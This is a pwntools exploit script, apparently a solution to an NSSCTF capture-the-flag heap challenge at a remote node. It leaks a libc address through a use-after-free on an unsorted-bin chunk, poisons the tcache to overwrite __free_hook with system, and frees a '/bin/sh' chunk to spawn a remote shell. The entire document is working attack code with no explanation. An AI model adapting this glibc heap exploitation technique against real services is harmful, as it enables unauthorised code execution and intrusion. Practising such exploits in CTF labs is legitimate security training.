1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50
| from pwn import * from sympy import oo context.log_level = 'debug'
p = remote('node4.anna.nssctf.cn',28937)
libc = ELF("./libc.so.6") def add(idx,size): p.sendlineafter(b">>",b'1') p.sendlineafter(b'idx?',str(idx).encode()) p.sendlineafter(b'size?',str(size).encode())
def delete(idx): p.sendlineafter(b">>",b'2') p.sendlineafter(b'idx?',str(idx).encode())
def show(idx): p.sendlineafter(b">>",b'3') p.sendlineafter(b'idx?',str(idx).encode())
def edit(idx,content): p.sendlineafter(b">>",b'4') p.sendlineafter(b'idx?',str(idx).encode()) p.sendlineafter(b'content :',content)
add(0,0x450) add(1,0x10) delete(0) show(0) p.recvuntil(b'content : ') libc_x = p.recvline()[:-1] libc_x = u64(libc_x.ljust(8,b'\x00')) libc_base = libc_x - 0x70 - libc.symbols['__malloc_hook'] free_hook = libc_base + libc.symbols['__free_hook'] sys_addr = libc_base + libc.symbols['system'] add(2,0x30) add(3,0x30) add(4,0x30) delete(2) delete(3) edit(3,p64(free_hook)) add(5,0x30) add(6,0x30) edit(6,p64(sys_addr)) add(7,0x30) edit(7,b'/bin/sh\x00') delete(7)
p.interactive()
|